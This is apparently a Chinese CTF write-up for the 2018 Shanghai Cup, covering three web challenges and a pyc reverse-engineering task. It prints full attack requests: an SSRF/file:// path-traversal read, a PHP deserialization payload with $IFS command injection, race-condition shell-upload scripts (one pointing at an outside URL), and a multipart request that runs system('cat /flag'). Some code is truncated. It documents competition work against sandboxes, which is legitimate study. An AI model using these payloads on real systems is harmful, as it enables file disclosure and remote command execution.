title: 2018上海杯WP
date: 2018-11-05 20:17:30
tags: [WP]
WEB-1
题目:what are you doing?
访问web1链接出现what are you doing? 常规思路看一下网站源码,发现有robots.txt
what are you doing?
我们访问robots.txt发现有两个php文件
source.php
flag.php
访问flag.php是一个空白页面,访问source.php回显you need to login as admin!我们查看source.php的源码
you need to login as admin!
嗯,我们需要用admin身份登陆,post过去admin=1
you need to login as admin!only 127.0.0.1 can get the flag!!
我们需要用127.0.0.1去访问,我们在请求头里添加x-client-ip:127.0.0.1,然后再去发包
you need to login as admin!you need post url: http://www.ichunqiu.com
根据提示我们post过去下面的数据,发现会返回一个图片地址,但这个图片无法显示,我们把图片下载下来,会发现他是html,而且i春秋的主页
mark
到这里其实卡了半天,在‘’url=https://www.ichunqiu.com+路径会得到该路径的网页源码,尝试拼接url然后下载flag.php的源码,但是拼接半天未果。还是队友后来想到了直接跳转目录,访问本地文件flag.php,然后把返回的该图片载下来,就是flag.php的源码,payload如下
POST /source.php HTTP/1.1
Host: a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
x-client-ip:127.0.0.1
Referer: http://a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com/source.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Connection: keep-alive
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1541299543; UM_distinctid=16554da401239b-0683daa189f84b-4c312878-144000-16554da401358; pgv_pvi=8097842176; ci_session=b34f5f4fa25e7d36b3c6f0d3efae40f090604014; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; pgv_si=s5565527040; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1541318560; Hm_lvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lpvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lvt_1a32f7c660491887db0960e9c314b022=1541299549; Hm_lpvt_1a32f7c660491887db0960e9c314b022=1541299549
Upgrade-Insecure-Requests: 1
admin=1&url=file://www.ichunqiu.com/../../var/www/html/flag.php
mark
最后拿到把图片改成php文件,拿到flag
web-2
题目:Can you hack me?
这个题是个.swp的文件泄露,我们把.swp文件下载下来进行源码审计
mark
.swp文件需要在linux下用vi -r index.php.swp来恢复文件
然后开始代码审计········
method = $method;
$this->args = $args;
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf(trim($v));
}
}
function waf($str){
$str=preg_replace("/[<>*;|?\n ]/","",$str);
$str=str_replace('flag','',$str);
return $str;
}
function echo($host){
system("echo $host");
}
function __destruct(){
if (in_array($this->method, array("echo"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
if($i===1)
{
$i++;
$$key = $value;
}
else{break;}
}
if($first==="doller")
{
@parse_str($_GET['a']);
if($var==="give")
{
if($bbb==="me")
{
if($ccc==="flag")
{
echo "
welcome!
";
$come=@$_POST['come'];
unserialize($come);
}
}
else
{echo "
think about it
";}
}
else
{
echo "NO";
}
}
else
{
echo "Can you hack me?
";
}
?>
通过分析代码我们可以知道要先get参数绕过然后执行反序列化,get参数绕过如下
?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag
然后开始思考绕过反序列化,根据题目代码得知,__wakeup方法执行了一个过滤字符的waf。所以需要利用谷歌发现的CVE-2016-7124漏洞,当序列化的字符串中,如果表示对象属性的个数的值大于真实的属性个数就会跳过wakeup的执行。 可是发现本地测试可以通过,远程却不可以。。。。难受了,开始代码审计,发现没有过滤斜杠,而空格可以使用$IFS绕过,同时通过学习参考链接:
https://www.knowsec.net/archives/341/
https://blog.csdn.net/qq_42196196/article/details/81217375?utm_source=blogkpcl1
于是payload:
POST /?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag HTTP/1.1
Host: f927629d24dd4e0b84ef5e917d89dba041b03b9deb3641d9.game.ichunqiu.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
come=O:4:"come":2:{s:12:"%00come%00method";s:4:"echo";s:10:"%00come%00args";a:2:{i:0;s:18:"`cat$IFS/flflagag`";i:1;s:3:"hjj";}}
web-3
打开题目,直接给了源码。
竞争上传shell
poc1
import threading
import requests
def send(num):
url="http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"
# url="http://web3.shb.5am3"
file_name = "file"
file_upload_name = "5am3.php"
f= open("5am3.php","r")
data={
"file[1]":"aaa",
"file[]":"php",
"hehe":"http://test2.5am3.com/test.php"
}
file={
file_name: (file_upload_name, f),
}
# print("2")
try:
req=requests.post(url, data, files=file)
# print(req.text)
if("@" in req.text):
print("crack ok!")
except Exception as e:
print "1"
def crack(threadNumber=5):
threads=[]
for num in range(120,121):
threads.append(threading.Thread(target=send,args=(num,)))
for thread in threads:
thread.start()
while True:
if (len(threading.enumerate()) < threadNumber):
break
while(1):
crack()
# send(111)
poc2
import threading
import requests
def send(num):
url="http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"
# url="http://web3.shb.5am3"
file_name = "file"
file_upload_name = "5am3.php"
f= open("5am32.php","r")
data={
"file[1]":"aaa",
"file[]":"php",
"hehe":str(num)+".php"
}
file={
file_name: (file_upload_name, f),
}
# print("2")
try:
req=requests.post(url, data, files=file)
# print(req.text)
if("@" in req.text):
print("crack ok!")
except Exception as e:
print "1"
def crack(threadNumber=20):
threads=[]
for num in range(100,900):
threads.append(threading.Thread(target=send,args=(num,)))
for thread in threads:
thread.start()
while True:
if (len(threading.enumerate()) < threadNumber):
break
while(1):
crack()
# send(111)
payload :
POST / HTTP/1.1
Host: 1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://web3.shb.5am3/
Content-Type: multipart/form-data; boundary=---------------------------21022237801674110016436295918
Content-Length: 1107
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file"; filename="5am3.php"
Content-Type: text/php
@
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file[1]"
sssss.asd
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file[]"
php
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="hehe"
/var/sandbox/2765d621af8a58b78b4d528bd5ef7f6b/config.php
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="pass"
5am3
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="kn0ck"
system("cat /flag");
-----------------------------21022237801674110016436295918--
MISC-easy py
可以通过010 editor来分析pyc文件结构,然后让其生成CSV文件,简单排版后根据010自动检测出的变量列表填入Value,并推测其实际的python代码。并且推测程序加密逻辑,进而写出解密程序。
mark
mark
int cmp[15]={};
int q=0;
for(int i=0;i<15;i++)
{
for(int j=0;j<255;j++)
{
if(cmp[q] == ((~j)&102)|(j&(-103)))
{
q=q+1;
cout<<(char)j;
break;
}
}
}
可以写出解密脚本
cpp
根据逆向发现flag经过两层加密,因为运算量较小,可直接通过爆破法直接求解
[图片上传失败...(image-58b289-1554278615899)]
最终 flag{W0w_y0u_m4st3r_C_p1us_p1us}